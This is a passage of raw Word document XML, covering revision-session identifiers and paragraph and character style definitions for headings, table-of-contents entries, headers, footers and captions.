    <w:rsid w:val="00861F2A"/>
    <w:rsid w:val="0086210A"/>
    <w:rsid w:val="00862DED"/>
    <w:rsid w:val="00865146"/>
    <w:rsid w:val="0086783E"/>
    <w:rsid w:val="00867AFA"/>
    <w:rsid w:val="008716D0"/>
    <w:rsid w:val="008733A7"/>
    <w:rsid w:val="008737B8"/>
    <w:rsid w:val="008746E3"/>
    <w:rsid w:val="00874B1E"/>
    <w:rsid w:val="00875207"/>
    <w:rsid w:val="00877831"/>
    <w:rsid w:val="00880637"/>
    <w:rsid w:val="0088295B"/>
    <w:rsid w:val="00882DAC"/>
    <w:rsid w:val="00882FAF"/>
    <w:rsid w:val="008864AE"/>
    <w:rsid w:val="00886AF4"/>
    <w:rsid w:val="008874E8"/>
    <w:rsid w:val="00896636"/>
    <w:rsid w:val="00896C7C"/>
    <w:rsid w:val="008A2C99"/>
    <w:rsid w:val="008A30D4"/>
    <w:rsid w:val="008A41CD"/>
    <w:rsid w:val="008A5018"/>
    <w:rsid w:val="008A7062"/>
    <w:rsid w:val="008B0A5F"/>
    <w:rsid w:val="008C6EC3"/>
    <w:rsid w:val="008C7C9C"/>
    <w:rsid w:val="008D25E9"/>
    <w:rsid w:val="008D4C7D"/>
    <w:rsid w:val="008D6EA4"/>
    <w:rsid w:val="008E0875"/>
    <w:rsid w:val="008E535B"/>
    <w:rsid w:val="008F023F"/>
    <w:rsid w:val="008F075B"/>
    <w:rsid w:val="008F241A"/>
    <w:rsid w:val="008F2468"/>
    <w:rsid w:val="008F673F"/>
    <w:rsid w:val="00900A9A"/>
    <w:rsid w:val="009010C8"/>
    <w:rsid w:val="00901B9C"/>
    <w:rsid w:val="009046A9"/>
    <w:rsid w:val="009220E5"/>
    <w:rsid w:val="0092446B"/>
    <w:rsid w:val="00924590"/>
    <w:rsid w:val="00926F24"/>
    <w:rsid w:val="00926F29"/>
    <w:rsid w:val="00930ABF"/>
    <w:rsid w:val="00931734"/>
    <w:rsid w:val="009325CB"/>
    <w:rsid w:val="00940B15"/>
    <w:rsid w:val="00943C00"/>
    <w:rsid w:val="009503DF"/>
    <w:rsid w:val="0095173F"/>
    <w:rsid w:val="00952EA2"/>
    <w:rsid w:val="00957BC5"/>
    <w:rsid w:val="009605FF"/>
    <w:rsid w:val="00960C3C"/>
    <w:rsid w:val="00960D1F"/>
    <w:rsid w:val="00962747"/>
    <w:rsid w:val="00963D43"/>
    <w:rsid w:val="00963E23"/>
    <w:rsid w:val="009643FC"/>
    <w:rsid w:val="00965A8B"/>
    <w:rsid w:val="00971326"/>
    <w:rsid w:val="009746DF"/>
    <w:rsid w:val="00977378"/>
    <w:rsid w:val="0098146A"/>
    <w:rsid w:val="00984B26"/>
    <w:rsid w:val="00984F1C"/>
    <w:rsid w:val="0098511F"/>
    <w:rsid w:val="00985729"/>
    <w:rsid w:val="00985CC4"/>
    <w:rsid w:val="00986851"/>
    <w:rsid w:val="00990E52"/>
    <w:rsid w:val="00990FBE"/>
    <w:rsid w:val="00991451"/>
    <w:rsid w:val="00993F8B"/>
    <w:rsid w:val="0099620C"/>
    <w:rsid w:val="0099631F"/>
    <w:rsid w:val="009A00F7"/>
    <w:rsid w:val="009A306B"/>
    <w:rsid w:val="009A3CCD"/>
    <w:rsid w:val="009A4491"/>
    <w:rsid w:val="009A6694"/>
    <w:rsid w:val="009A77A2"/>
    <w:rsid w:val="009A7B9A"/>
    <w:rsid w:val="009B0055"/>
    <w:rsid w:val="009B2B66"/>
    <w:rsid w:val="009B32E5"/>
    <w:rsid w:val="009B5211"/>
    <w:rsid w:val="009B58A2"/>
    <w:rsid w:val="009B68EF"/>
    <w:rsid w:val="009B7023"/>
    <w:rsid w:val="009C1928"/>
    <w:rsid w:val="009C1CFE"/>
    <w:rsid w:val="009C499C"/>
    <w:rsid w:val="009C5714"/>
    <w:rsid w:val="009C5A2F"/>
    <w:rsid w:val="009D076B"/>
    <w:rsid w:val="009D4C9D"/>
    <w:rsid w:val="009D6836"/>
    <w:rsid w:val="009E03CD"/>
    <w:rsid w:val="009E1845"/>
    <w:rsid w:val="009E20DC"/>
    <w:rsid w:val="009E3DDF"/>
    <w:rsid w:val="009E3EAF"/>
    <w:rsid w:val="009E47FD"/>
    <w:rsid w:val="009E4A10"/>
    <w:rsid w:val="009E58CA"/>
    <w:rsid w:val="009E5E1E"/>
    <w:rsid w:val="009F19AC"/>
    <w:rsid w:val="00A0100A"/>
    <w:rsid w:val="00A0177F"/>
    <w:rsid w:val="00A06FB3"/>
    <w:rsid w:val="00A200FA"/>
    <w:rsid w:val="00A22147"/>
    <w:rsid w:val="00A231F3"/>
    <w:rsid w:val="00A25F97"/>
    <w:rsid w:val="00A26C7F"/>
    <w:rsid w:val="00A27023"/>
    <w:rsid w:val="00A305BC"/>
    <w:rsid w:val="00A33FB2"/>
    <w:rsid w:val="00A3777D"/>
    <w:rsid w:val="00A41F3E"/>
    <w:rsid w:val="00A423B5"/>
    <w:rsid w:val="00A43436"/>
    <w:rsid w:val="00A45BE1"/>
    <w:rsid w:val="00A461D5"/>
    <w:rsid w:val="00A46E5A"/>
    <w:rsid w:val="00A47FAB"/>
    <w:rsid w:val="00A51735"/>
    <w:rsid w:val="00A57087"/>
    <w:rsid w:val="00A60B49"/>
    <w:rsid w:val="00A61DBA"/>
    <w:rsid w:val="00A62118"/>
    <w:rsid w:val="00A66418"/>
    <w:rsid w:val="00A6745C"/>
    <w:rsid w:val="00A67DDA"/>
    <w:rsid w:val="00A742AB"/>
    <w:rsid w:val="00A770F7"/>
    <w:rsid w:val="00A77221"/>
    <w:rsid w:val="00A77B39"/>
    <w:rsid w:val="00A8035E"/>
    <w:rsid w:val="00A87146"/>
    <w:rsid w:val="00AA0A53"/>
    <w:rsid w:val="00AA4355"/>
    <w:rsid w:val="00AA62E4"/>
    <w:rsid w:val="00AA725B"/>
    <w:rsid w:val="00AA7D5C"/>
    <w:rsid w:val="00AB18D0"/>
    <w:rsid w:val="00AB2C67"/>
    <w:rsid w:val="00AB31FA"/>
    <w:rsid w:val="00AB38D7"/>
    <w:rsid w:val="00AB4476"/>
    <w:rsid w:val="00AC07E2"/>
    <w:rsid w:val="00AC353F"/>
    <w:rsid w:val="00AD649A"/>
    <w:rsid w:val="00AD650E"/>
    <w:rsid w:val="00AD7DC7"/>
    <w:rsid w:val="00AE009A"/>
    <w:rsid w:val="00AE0E25"/>
    <w:rsid w:val="00AE3BE8"/>
    <w:rsid w:val="00AF28F1"/>
    <w:rsid w:val="00AF47FB"/>
    <w:rsid w:val="00AF5DB4"/>
    <w:rsid w:val="00AF5DFC"/>
    <w:rsid w:val="00AF69DA"/>
    <w:rsid w:val="00B04C46"/>
    <w:rsid w:val="00B0560C"/>
    <w:rsid w:val="00B05C09"/>
    <w:rsid w:val="00B1107F"/>
    <w:rsid w:val="00B1182B"/>
    <w:rsid w:val="00B12CA0"/>
    <w:rsid w:val="00B13DB8"/>
    <w:rsid w:val="00B1611E"/>
    <w:rsid w:val="00B16A68"/>
    <w:rsid w:val="00B210B9"/>
    <w:rsid w:val="00B228D2"/>
    <w:rsid w:val="00B22AFE"/>
    <w:rsid w:val="00B334A8"/>
    <w:rsid w:val="00B35CE5"/>
    <w:rsid w:val="00B36490"/>
    <w:rsid w:val="00B36B40"/>
    <w:rsid w:val="00B37723"/>
    <w:rsid w:val="00B407E3"/>
    <w:rsid w:val="00B514AF"/>
    <w:rsid w:val="00B5346B"/>
    <w:rsid w:val="00B544F6"/>
    <w:rsid w:val="00B56C0D"/>
    <w:rsid w:val="00B607E9"/>
    <w:rsid w:val="00B6106B"/>
    <w:rsid w:val="00B613CE"/>
    <w:rsid w:val="00B6768F"/>
    <w:rsid w:val="00B679C6"/>
    <w:rsid w:val="00B744E7"/>
    <w:rsid w:val="00B75520"/>
    <w:rsid w:val="00B762A4"/>
    <w:rsid w:val="00B80586"/>
    <w:rsid w:val="00B81F7A"/>
    <w:rsid w:val="00B820A7"/>
    <w:rsid w:val="00B82F82"/>
    <w:rsid w:val="00BA0692"/>
    <w:rsid w:val="00BA45FD"/>
    <w:rsid w:val="00BA606C"/>
    <w:rsid w:val="00BB03D1"/>
    <w:rsid w:val="00BB16D8"/>
    <w:rsid w:val="00BC2B04"/>
    <w:rsid w:val="00BC495E"/>
    <w:rsid w:val="00BC6950"/>
    <w:rsid w:val="00BD3E91"/>
    <w:rsid w:val="00BD488B"/>
    <w:rsid w:val="00BD4B9E"/>
    <w:rsid w:val="00BD4F57"/>
    <w:rsid w:val="00BD5AA5"/>
    <w:rsid w:val="00BD6A76"/>
    <w:rsid w:val="00BD77FD"/>
    <w:rsid w:val="00BE1849"/>
    <w:rsid w:val="00BE1B72"/>
    <w:rsid w:val="00BE1FDE"/>
    <w:rsid w:val="00BE6724"/>
    <w:rsid w:val="00BE687D"/>
    <w:rsid w:val="00BF0C37"/>
    <w:rsid w:val="00BF477A"/>
    <w:rsid w:val="00BF554D"/>
    <w:rsid w:val="00BF65E4"/>
    <w:rsid w:val="00C03B46"/>
    <w:rsid w:val="00C03FC9"/>
    <w:rsid w:val="00C0549B"/>
    <w:rsid w:val="00C073D3"/>
    <w:rsid w:val="00C10B75"/>
    <w:rsid w:val="00C1560E"/>
    <w:rsid w:val="00C17AEA"/>
    <w:rsid w:val="00C220C7"/>
    <w:rsid w:val="00C22884"/>
    <w:rsid w:val="00C22979"/>
    <w:rsid w:val="00C23FA5"/>
    <w:rsid w:val="00C244EA"/>
    <w:rsid w:val="00C2620D"/>
    <w:rsid w:val="00C26C85"/>
    <w:rsid w:val="00C272A7"/>
    <w:rsid w:val="00C3180A"/>
    <w:rsid w:val="00C3244D"/>
    <w:rsid w:val="00C34B1F"/>
    <w:rsid w:val="00C34BEA"/>
    <w:rsid w:val="00C400C7"/>
    <w:rsid w:val="00C4120E"/>
    <w:rsid w:val="00C458E7"/>
    <w:rsid w:val="00C46D3D"/>
    <w:rsid w:val="00C47329"/>
    <w:rsid w:val="00C50296"/>
    <w:rsid w:val="00C50F35"/>
    <w:rsid w:val="00C52AB3"/>
    <w:rsid w:val="00C53656"/>
    <w:rsid w:val="00C56CA2"/>
    <w:rsid w:val="00C6048C"/>
    <w:rsid w:val="00C70591"/>
    <w:rsid w:val="00C71C5B"/>
    <w:rsid w:val="00C734AB"/>
    <w:rsid w:val="00C75B11"/>
    <w:rsid w:val="00C76579"/>
    <w:rsid w:val="00C80AAD"/>
    <w:rsid w:val="00C80AE4"/>
    <w:rsid w:val="00C822D7"/>
    <w:rsid w:val="00C85346"/>
    <w:rsid w:val="00C924AB"/>
    <w:rsid w:val="00C9459B"/>
    <w:rsid w:val="00C97636"/>
    <w:rsid w:val="00C977DA"/>
    <w:rsid w:val="00C97880"/>
    <w:rsid w:val="00C97DD6"/>
    <w:rsid w:val="00C97EF7"/>
    <w:rsid w:val="00CA0058"/>
    <w:rsid w:val="00CA0763"/>
    <w:rsid w:val="00CA1C2E"/>
    <w:rsid w:val="00CA2053"/>
    <w:rsid w:val="00CA2CF7"/>
    <w:rsid w:val="00CA4388"/>
    <w:rsid w:val="00CA450B"/>
    <w:rsid w:val="00CA6235"/>
    <w:rsid w:val="00CB0281"/>
    <w:rsid w:val="00CB3235"/>
    <w:rsid w:val="00CB6AB9"/>
    <w:rsid w:val="00CB6CF5"/>
    <w:rsid w:val="00CC0515"/>
    <w:rsid w:val="00CC3EF1"/>
    <w:rsid w:val="00CD197E"/>
    <w:rsid w:val="00CD1D20"/>
    <w:rsid w:val="00CD1FAB"/>
    <w:rsid w:val="00CD4FE2"/>
    <w:rsid w:val="00CE0964"/>
    <w:rsid w:val="00CE187A"/>
    <w:rsid w:val="00CE563A"/>
    <w:rsid w:val="00CF2A1C"/>
    <w:rsid w:val="00CF4FEC"/>
    <w:rsid w:val="00CF5102"/>
    <w:rsid w:val="00CF6151"/>
    <w:rsid w:val="00CF642A"/>
    <w:rsid w:val="00D00603"/>
    <w:rsid w:val="00D03D96"/>
    <w:rsid w:val="00D045E7"/>
    <w:rsid w:val="00D04C0E"/>
    <w:rsid w:val="00D05B32"/>
    <w:rsid w:val="00D0754E"/>
    <w:rsid w:val="00D07633"/>
    <w:rsid w:val="00D143FA"/>
    <w:rsid w:val="00D148E0"/>
    <w:rsid w:val="00D1495F"/>
    <w:rsid w:val="00D277E8"/>
    <w:rsid w:val="00D30CC6"/>
    <w:rsid w:val="00D30E4C"/>
    <w:rsid w:val="00D3294E"/>
    <w:rsid w:val="00D337EC"/>
    <w:rsid w:val="00D354AA"/>
    <w:rsid w:val="00D37A75"/>
    <w:rsid w:val="00D40C55"/>
    <w:rsid w:val="00D469DA"/>
    <w:rsid w:val="00D46F18"/>
    <w:rsid w:val="00D5293E"/>
    <w:rsid w:val="00D5447E"/>
    <w:rsid w:val="00D57FAF"/>
    <w:rsid w:val="00D61324"/>
    <w:rsid w:val="00D6232D"/>
    <w:rsid w:val="00D62C0C"/>
    <w:rsid w:val="00D660C8"/>
    <w:rsid w:val="00D662D6"/>
    <w:rsid w:val="00D67569"/>
    <w:rsid w:val="00D679F6"/>
    <w:rsid w:val="00D756E1"/>
    <w:rsid w:val="00D768F0"/>
    <w:rsid w:val="00D817A7"/>
    <w:rsid w:val="00D81CD4"/>
    <w:rsid w:val="00D85BA3"/>
    <w:rsid w:val="00D87C5B"/>
    <w:rsid w:val="00D92C38"/>
    <w:rsid w:val="00D93889"/>
    <w:rsid w:val="00D93CA1"/>
    <w:rsid w:val="00D94A09"/>
    <w:rsid w:val="00D96D87"/>
    <w:rsid w:val="00D970A1"/>
    <w:rsid w:val="00DA0EB3"/>
    <w:rsid w:val="00DA1D03"/>
    <w:rsid w:val="00DA2831"/>
    <w:rsid w:val="00DA41F4"/>
    <w:rsid w:val="00DA6BCD"/>
    <w:rsid w:val="00DA7190"/>
    <w:rsid w:val="00DB0296"/>
    <w:rsid w:val="00DB02BE"/>
    <w:rsid w:val="00DB2CC0"/>
    <w:rsid w:val="00DB5C77"/>
    <w:rsid w:val="00DB6463"/>
    <w:rsid w:val="00DC3350"/>
    <w:rsid w:val="00DC6169"/>
    <w:rsid w:val="00DD054C"/>
    <w:rsid w:val="00DD1A3D"/>
    <w:rsid w:val="00DD1B47"/>
    <w:rsid w:val="00DD2F93"/>
    <w:rsid w:val="00DD4039"/>
    <w:rsid w:val="00DE0453"/>
    <w:rsid w:val="00DE0FFF"/>
    <w:rsid w:val="00DE4084"/>
    <w:rsid w:val="00DE6606"/>
    <w:rsid w:val="00DF57DC"/>
    <w:rsid w:val="00DF5BF1"/>
    <w:rsid w:val="00DF65EB"/>
    <w:rsid w:val="00DF7496"/>
    <w:rsid w:val="00DF75C0"/>
    <w:rsid w:val="00DF7844"/>
    <w:rsid w:val="00DF7A7C"/>
    <w:rsid w:val="00E005A1"/>
    <w:rsid w:val="00E0220B"/>
    <w:rsid w:val="00E04639"/>
    <w:rsid w:val="00E04D10"/>
    <w:rsid w:val="00E07C09"/>
    <w:rsid w:val="00E11F90"/>
    <w:rsid w:val="00E121D3"/>
    <w:rsid w:val="00E13FB2"/>
    <w:rsid w:val="00E15258"/>
    <w:rsid w:val="00E17AA4"/>
    <w:rsid w:val="00E17D83"/>
    <w:rsid w:val="00E20AE7"/>
    <w:rsid w:val="00E2197E"/>
    <w:rsid w:val="00E2335C"/>
    <w:rsid w:val="00E24DCF"/>
    <w:rsid w:val="00E253E6"/>
    <w:rsid w:val="00E3642C"/>
    <w:rsid w:val="00E37923"/>
    <w:rsid w:val="00E40031"/>
    <w:rsid w:val="00E41596"/>
    <w:rsid w:val="00E4361C"/>
    <w:rsid w:val="00E4437C"/>
    <w:rsid w:val="00E47B55"/>
    <w:rsid w:val="00E514CD"/>
    <w:rsid w:val="00E5151D"/>
    <w:rsid w:val="00E52578"/>
    <w:rsid w:val="00E527F7"/>
    <w:rsid w:val="00E5385A"/>
    <w:rsid w:val="00E53D0F"/>
    <w:rsid w:val="00E56A10"/>
    <w:rsid w:val="00E664BE"/>
    <w:rsid w:val="00E70437"/>
    <w:rsid w:val="00E73576"/>
    <w:rsid w:val="00E759C8"/>
    <w:rsid w:val="00E80E68"/>
    <w:rsid w:val="00E81A33"/>
    <w:rsid w:val="00E86DA4"/>
    <w:rsid w:val="00E87C80"/>
    <w:rsid w:val="00E91843"/>
    <w:rsid w:val="00E93377"/>
    <w:rsid w:val="00E93AC5"/>
    <w:rsid w:val="00E9765D"/>
    <w:rsid w:val="00E97DD2"/>
    <w:rsid w:val="00EA0C91"/>
    <w:rsid w:val="00EA2D69"/>
    <w:rsid w:val="00EB0740"/>
    <w:rsid w:val="00EB12FE"/>
    <w:rsid w:val="00EB3082"/>
    <w:rsid w:val="00EB32FF"/>
    <w:rsid w:val="00EB3B02"/>
    <w:rsid w:val="00EB6F7D"/>
    <w:rsid w:val="00EB7228"/>
    <w:rsid w:val="00EB7E44"/>
    <w:rsid w:val="00EC2670"/>
    <w:rsid w:val="00EC267B"/>
    <w:rsid w:val="00EC2780"/>
    <w:rsid w:val="00EC39B0"/>
    <w:rsid w:val="00EC5B08"/>
    <w:rsid w:val="00EC6406"/>
    <w:rsid w:val="00ED4A81"/>
    <w:rsid w:val="00EE181A"/>
    <w:rsid w:val="00EE4A13"/>
    <w:rsid w:val="00EE4A34"/>
    <w:rsid w:val="00EE57C3"/>
    <w:rsid w:val="00EE6A8E"/>
    <w:rsid w:val="00EF0F16"/>
    <w:rsid w:val="00EF1470"/>
    <w:rsid w:val="00EF1E1E"/>
    <w:rsid w:val="00EF2B18"/>
    <w:rsid w:val="00EF35A9"/>
    <w:rsid w:val="00EF397A"/>
    <w:rsid w:val="00EF3F75"/>
    <w:rsid w:val="00EF433A"/>
    <w:rsid w:val="00F02EC6"/>
    <w:rsid w:val="00F03FF9"/>
    <w:rsid w:val="00F07E59"/>
    <w:rsid w:val="00F10045"/>
    <w:rsid w:val="00F138FA"/>
    <w:rsid w:val="00F1469C"/>
    <w:rsid w:val="00F151C0"/>
    <w:rsid w:val="00F16B4A"/>
    <w:rsid w:val="00F2041F"/>
    <w:rsid w:val="00F214AA"/>
    <w:rsid w:val="00F23579"/>
    <w:rsid w:val="00F23766"/>
    <w:rsid w:val="00F2447A"/>
    <w:rsid w:val="00F318F0"/>
    <w:rsid w:val="00F377EF"/>
    <w:rsid w:val="00F400A6"/>
    <w:rsid w:val="00F454C4"/>
    <w:rsid w:val="00F4581F"/>
    <w:rsid w:val="00F46699"/>
    <w:rsid w:val="00F466C1"/>
    <w:rsid w:val="00F46BA1"/>
    <w:rsid w:val="00F50E84"/>
    <w:rsid w:val="00F55772"/>
    <w:rsid w:val="00F56503"/>
    <w:rsid w:val="00F57C04"/>
    <w:rsid w:val="00F61D19"/>
    <w:rsid w:val="00F62CF2"/>
    <w:rsid w:val="00F64C05"/>
    <w:rsid w:val="00F67044"/>
    <w:rsid w:val="00F67F77"/>
    <w:rsid w:val="00F71E35"/>
    <w:rsid w:val="00F72323"/>
    <w:rsid w:val="00F75D67"/>
    <w:rsid w:val="00F81A8F"/>
    <w:rsid w:val="00F869AF"/>
    <w:rsid w:val="00F93531"/>
    <w:rsid w:val="00F9431D"/>
    <w:rsid w:val="00F959CF"/>
    <w:rsid w:val="00F96D50"/>
    <w:rsid w:val="00FA092B"/>
    <w:rsid w:val="00FA09C4"/>
    <w:rsid w:val="00FA1EF4"/>
    <w:rsid w:val="00FA1F37"/>
    <w:rsid w:val="00FA3632"/>
    <w:rsid w:val="00FA5E5D"/>
    <w:rsid w:val="00FA635C"/>
    <w:rsid w:val="00FB08BE"/>
    <w:rsid w:val="00FB4C89"/>
    <w:rsid w:val="00FB766C"/>
    <w:rsid w:val="00FC1889"/>
    <w:rsid w:val="00FC2B82"/>
    <w:rsid w:val="00FC3197"/>
    <w:rsid w:val="00FC53AB"/>
    <w:rsid w:val="00FC5987"/>
    <w:rsid w:val="00FD0D9D"/>
    <w:rsid w:val="00FD17EB"/>
    <w:rsid w:val="00FD389A"/>
    <w:rsid w:val="00FD3DBC"/>
    <w:rsid w:val="00FD6531"/>
    <w:rsid w:val="00FE0804"/>
    <w:rsid w:val="00FE0A4E"/>
    <w:rsid w:val="00FE0DDB"/>
    <w:rsid w:val="00FE1D2F"/>
    <w:rsid w:val="00FE241B"/>
    <w:rsid w:val="00FE5F61"/>
    <w:rsid w:val="00FE6389"/>
    <w:rsid w:val="00FF6FA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C8D8A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0114BA0-5E5D-4141-BDA1-C6595166B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2F93"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial"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2F93"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0" w:line="232" w:lineRule="auto"/>
      <w:ind w:left="-5" w:right="18" w:hanging="10"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EB32FF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial"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07633"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial"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32F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10514"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00610514"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D3A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3A2A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D3A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3A2A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0023799B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DD2F93"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00DD2F93"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DD2F93"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD2F93"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="232" w:lineRule="auto"/>
      <w:ind w:right="18" w:hanging="10"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:kern w:val="2"/>
      <w:sz w:val="23"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DD2F93"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="232" w:lineRule="auto"/>
      <w:ind w:left="230" w:right="18" w:hanging="10"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:kern w:val="2"/>
      <w:sz w:val="23"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EB32FF"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EB32FF"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D07633"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="00DA1D03"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004017D6"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
